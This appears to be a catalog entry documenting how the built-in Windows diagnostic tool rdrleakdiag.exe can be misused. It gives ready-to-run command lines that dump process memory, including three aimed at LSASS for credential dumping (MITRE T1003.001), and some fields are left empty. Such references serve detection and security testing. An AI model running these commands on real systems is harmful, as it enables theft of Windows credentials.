.. / rdrleakdiag.exe
Star

Microsoft Windows resource leak diagnostic tool


Paths:

Resources:
Acknowledgements:

Detection:

Dump

Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
Usecase: Dump process by PID.
Privileges required: User
OS: Windows
MITRE ATT&CK®: T1003



Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
Usecase: Dump LSASS process.
Privileges required: Administrator
OS: Windows
MITRE ATT&CK®: T1003.001



After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
Usecase: Dump LSASS process mutliple times.
Privileges required: Administrator
OS: Windows
MITRE ATT&CK®: T1003.001